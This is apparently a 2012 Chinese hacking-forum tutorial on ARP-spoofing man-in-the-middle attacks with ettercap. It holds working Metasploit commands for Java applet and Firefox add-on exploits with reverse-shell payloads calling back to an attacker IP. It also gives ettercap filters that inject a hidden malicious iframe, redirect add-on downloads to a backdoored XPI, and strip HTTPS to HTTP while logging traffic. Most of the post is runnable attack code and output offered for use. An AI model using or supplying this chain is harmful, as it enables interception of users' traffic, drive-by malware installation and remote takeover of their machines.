切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
49 : 中间人攻击 ettercap 灵活[复制链接]
发表于 2012-8-20 23:35:54 | 显示全部楼层 |!read_mode!
前言

Ettercap是一款基于终端的以太网络局域网嗅探器/拦截器/日志器。它支持主动和被动的多种协议解析(甚至是ssh和https这种加密过的)。还可以进行已建立连接的数据注入和实时过滤,保持连接同步。大部分嗅探模式都是强大且全面的嗅探组合。支持插件。能够识别你是否出在交换式局域网中,通过使用操作系统指纹(主动或被动)技术可以得出局域网结构。
前几天写的强大的嗅探工具ettercap使用教程:我的欺骗规则里吧ETTERCAP在内网中的作用写的很明白,其实这工具还有更多的作用
前几天徒弟wangzi问 “来讲讲ARP的试用范围吧”,今天解答他。

获得用户信息

以下环境乃我意淫,为的是更好展现如何用中间人攻击
首先探测目标的浏览器版本 以及目标的具体信息 用到的插件:remote_browser

  1. root@Dis9Team:~# ettercap -P remote_browser // // -T -q
复制代码

得到了我们想要的信息:



1.目标正在访问brk.dis9.com和 gmail.com
2.目标的系统是Linux,目标常用浏览器是Firefox对目标进行攻击首先说firefox的浏览器漏洞没新的,目标应该不存在浏览器的漏洞,我们可以放弃用挂马的方式来进行入侵,目标正在访问gmail.com和brk.dis9.com,也许我们可以嗅探他的密码,但是他可能已经登录了gmail.com,所以放弃嗅探密码
不知道目标安装了java没? 我们可以试一试
启动METASPLOIT,生成一个java后门

  1. msf > use exploit/multi/browser/java_signed_applet
  2.   msf  exploit(java_signed_applet) > show targets

  3. Exploit targets:

  4.    Id  Name
  5.    --  ----
  6.    0   Generic (Java Payload)
  7.    1   Windows x86 (Native Payload)
  8.    2   Linux x86 (Native Payload)
  9.    3   Mac OS X PPC (Native Payload)
  10.    4   Mac OS X x86 (Native Payload)


  11. msf  exploit(java_signed_applet) >
复制代码

目标是LINUX的 所以我们写入 2
  1. msf  exploit(java_signed_applet) > set TARGET 2
  2. TARGET => 2
  3. msf  exploit(java_signed_applet) >
  4. msf  exploit(java_signed_applet) > set PAYLOAD linux/x86/shell_reverse_tcp
  5. PAYLOAD => linux/x86/shell_reverse_tcp
  6. msf  exploit(java_signed_applet) > set LHOST 5.5.5.128
  7. LHOST => 5.5.5.128
  8. msf  exploit(java_signed_applet) > exploit -j
  9. [*] Exploit running as background job.
  10. msf  exploit(java_signed_applet) >
  11. [*] Started reverse handler on 5.5.5.128:4444
  12. [*] Using URL: http://0.0.0.0:8080/arF7rjQ
  13. [*]  Local IP: http://5.5.5.128:8080/arF7rjQ
  14. [*] Server started.
复制代码

然后用ettercap来挂马:
java door地址:http://5.5.5.128:8080/arF7rjQ
挂马EF:
  1. if (ip.proto == TCP && tcp.dst == 80) {
  2.    if (search(DATA.data, "Accept-Encoding")) {
  3.       replace("Accept-Encoding", "Accept-Rubbish!");
  4.       # note: replacement string is same length as original string
  5.       msg("zapped Accept-Encoding!\n");
  6.    }
  7. }
  8. if (search(DATA.data, "</body")) {
  9.            replace("</body", "<iframe src="http://5.5.5.128:8080/arF7rjQ" width=0 height=0></iframe></body");
  10.            msg("Filter Ran.\n");
  11. }
复制代码


编译后启动ETTERCAP
  1. root@Dis9Team:/tmp# ettercap -T -q -M arp:remote -F in.ef // //
复制代码
当目标访问存在  </body
元素的网页,并且安装了java后,那个什么的跳出来了 傻逼才会点

如果他真的是傻逼 那么。。


继续思考攻击对方既然安装了FIREFOX,那么我们可以对他的FIREFOX插件进行利用。
  1. msf > use exploit/multi/browser/firefox_xpi_bootstrapped_addon
  2. msf  exploit(firefox_xpi_bootstrapped_addon) >
复制代码


对方访问的是fuzzexp.org,我们为这个插件起个好听的名字:
  1. msf  exploit(firefox_xpi_bootstrapped_addon) > set ADDONNAME DIS9 TEAM Firefox Plugin  
  2. ADDONNAME => DIS9 TEAM Firefox Plugin
复制代码

写入目标:
  1. msf  exploit(firefox_xpi_bootstrapped_addon) > show targets

  2. Exploit targets:

  3.    Id  Name
  4.    --  ----
  5.    0   Generic (Java Payload)
  6.    1   Windows x86 (Native Payload)
  7.    2   Linux x86 (Native Payload)
  8.    3   Mac OS X PPC (Native Payload)
  9.    4   Mac OS X x86 (Native Payload)


  10. msf  exploit(firefox_xpi_bootstrapped_addon) > set TARGET 2
  11. TARGET => 2
  12. msf  exploit(firefox_xpi_bootstrapped_addon) >
复制代码



运行:
  1. msf  exploit(firefox_xpi_bootstrapped_addon) > exploit
  2. [*] Exploit running as background job.

  3. [*] Started reverse handler on 5.5.5.128:4444
  4. [*] Using URL: http://0.0.0.0:8080/S7QE4nvBjzxvG0
  5. [*]  Local IP: http://5.5.5.128:8080/S7QE4nvBjzxvG0
  6. [*] Server started.
  7. msf  exploit(firefox_xpi_bootstrapped_addon) >
复制代码


然后本机测试一下 我也用FIREFOX


开始挂马。
当目标浏览后。


点安装。 这个插件貌似是DIS9 TEAM官方的? 我装上去看看九区大黑客写的插件


然后你就悲剧了


更深入的FIREFOX如果他不上当咋办???那我们劫持他的全部插件
  1. # firefox xpi by Dis9Team
  2. if (ip.proto == TCP && search(DATA.data, "application/x-xpinstall") ){
  3. msg("found ff\n");
  4. if (search(DATA.data, "dos")) {
  5.      msg("doing nothing\n");
  6. } else {
  7. replace("200 OK", "301 Moved Permanently
  8. Location: http://5.5.5.128/1.xpi");
  9. msg("redirect success\n");

  10. }
  11. }
复制代码



吧生成的FIREFOX插件DOOR下载到本地APACHE目录 启动APACHE 更改上面的XPI地址 启动ETTERCAP
  1. root@Dis9Team:/tmp# etterfilter ff2 -o ff2.ef

  2. etterfilter NG-0.7.3 copyright 2001-2004 ALoR & NaGA


  3. 12 protocol tables loaded:
  4.         DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth

  5. 11 constants loaded:
  6.         VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP

  7. Parsing source file 'ff2'  done.

  8. Unfolding the meta-tree  done.

  9. Converting labels to real offsets  done.

  10. Writing output to 'ff2.ef'  done.

  11. -> Script encoded into 12 instructions.

  12. root@Dis9Team:/tmp# ettercap -T -q -M arp:remote -F ff2.ef // //
复制代码



然后在写个HTTPS跳转HTTP的FILE:
  1. if (ip.proto == TCP && search(DATA.data, "https") ) {
  2.    log(DATA.data, "/tmp/mispelled_ettercap.log");
  3.    replace("https", "http");
  4.    msg("Correctly substituted and logged.\n");
  5. }
复制代码



继续运行:
  1. root@Dis9Team:/tmp# ettercap -T -q -M arp:remote -F http.ef // //
复制代码








附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-2 06:18

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部